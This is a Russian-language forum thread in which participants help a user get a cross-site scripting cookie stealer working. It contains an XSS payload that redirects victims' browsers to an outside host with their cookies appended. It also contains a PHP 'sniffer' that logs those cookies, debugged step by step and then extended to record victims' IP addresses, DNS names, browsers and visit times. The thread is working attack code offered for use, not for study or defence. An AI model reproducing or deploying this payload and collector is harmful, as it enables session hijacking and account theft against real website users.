Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
<script&qt; document.location.href="http://www.humora.net.ru/Files/sniff.php"+ document.cookie; </script&qt;
Где sniff.php содержит такие строки:
<?
$f = fopen("snif.txt", "a");
fwrite($f, $REQUEST_URI);
fclose($f);
print("OK");
?&qt;
И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie :)
Подскажите че нетак, плиз, а то не знаю уже че за фигня

у тя он записывает тока урл. Всё дело в сниффере. Ты пишешь:
http://www.humora.net.ru/Files/sniff.php+ document.cookie
И переходит на урл+куки.

Просто добавь знак вопроса:
http://www.humora.net.ru/Files/sniff.php?
В снифере замени $REQUEST_URI на "$QUERY_STRING \n"

$_server['query_string']; лучше :)

Cпасибо :) Чето я и правду запарился) Щас буду пробовать :)

Хм.. Все сделал, поставил "?" теперь это выглядит так:
===
Parse error: syntax error, unexpected '?' in /var/www/user***/html/humora.net.ru/Files/sniff.php on line 6
===
тут код снифера:
===
<?
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?&qt;
===
туплю чето опять :)

аа все, уже не глючит :), новый код:
===
<?php
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?>
===

<?php
if($_SERVER['QUERY_STRING']){
$f = fopen("log", "a");
fwrite($f, $_SERVER['QUERY_STRING']."\n\n");
fclose($f);
}
?>

а может вы мне поможете к этому сниферу какие нибудь фишки прикрутить :)
ну там чтобы он какую нибудь инфу о компе собирал, какой нето Ip-адрес, браузер или еще чего-нибудь по удобней :) ?

тебе нужно тока версия браузера, урл и ип. Ничё лишнего. Ну можешь ещё сделать, чтоб одинаковые записи удалялись;) В иненте полно пхп-снифферов, даже на этом сайте есть выложенный где-то... Поиском пройдись

а может вы мне поможете к этому сниферу какие нибудь фишки прикрутить :)
ну там чтобы он какую нибудь инфу о компе собирал, какой нето Ip-адрес, браузер или еще чего-нибудь по удобней :) ?
можно дату, ип, днс и т.д...

<?php
if($_SERVER['QUERY_STRING']){
$ip = getenv("REMOTE_ADDR");
$time = date("H:i:s");
$useragent = getenv("HTTP_USER_AGENT");
$dns = gethostbyaddr($ip);
$fo = fopen("log.txt", "a");
fwrite($fo, "Query: ".$_SERVER['QUERY_STRING']." IP: ".$ip." DNS: ".$dns." UserAgent: ".$useragent." Time: ".$time."\n\n");
fclose($fo);
}
?>

смотри исходники полноценныхх снифферов, например от kanick'a ....